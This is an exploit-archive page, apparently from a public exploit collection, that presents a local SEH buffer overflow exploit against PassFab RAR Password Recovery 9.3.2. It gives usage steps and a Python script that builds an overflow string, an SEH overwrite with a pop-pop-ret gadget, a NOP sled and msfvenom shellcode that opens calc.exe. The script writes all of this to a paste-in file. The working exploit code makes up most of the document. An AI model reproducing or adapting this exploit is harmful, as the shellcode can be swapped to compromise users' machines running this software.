PassFab RAR 9.3.2 - Buffer Overflow (SEH)

2018-12-19 17:05:05

# Exploit Title: PassFab RAR Password Recovery SEH Local Exploit
# Date: 16-12-2018
# Vendor Homepage:https://www.passfab.com/products/rar-password-recovery.html
# Software Link: https://www.passfab.com/downloads/passfab-rar-password-recovery.exe
# Exploit Author: Achilles
# Tested Version: 9.3.2
# Tested on: Windows XP SP3


# 1.- Run python code : PassFab_RAR
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open PassFab RAR Password Recovery
# 4.- In the new Window click on the key in the upper right corner
# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Re=
gistration Code'
# 6.- Click 'Register'and the calculator will open
# 7.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/python

#!/usr/bin/env python
buffer =3D "\x41" * 260
NSEH =3D "\xeb\x06\x90\x90" #jmp short 6
SEH =3D "\xdd\x74\x06\x10" #pop pop ret SoftwareLog.dll
nops =3D "\x90" * 20

#badchar \x00\
#msfvenom -p windows/exec CMD=3Dcalc.exe -b "\x00" -f python
buf =3D ""
buf +=3D "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
buf +=3D "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
buf +=3D "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
buf +=3D "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
buf +=3D "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
buf +=3D "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
buf +=3D "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
buf +=3D "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
buf +=3D "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
buf +=3D "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
buf +=3D "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
buf +=3D "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
buf +=3D "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
buf +=3D "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
buf +=3D "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
buf +=3D "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
buf +=3D "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
buf +=3D "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
buf +=3D "\x8e\x2a\x79\xdb"

payload =3D buffer + NSEH + SEH + nops + buf


try:
=09f=3Dopen("Evil.txt","w")
=09print "[+] Creating %s bytes evil payload.." %len(payload)
=09f.write(payload)
=09f.close()
=09print "[+] File created!"
except:
=09print "File cannot be created"

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.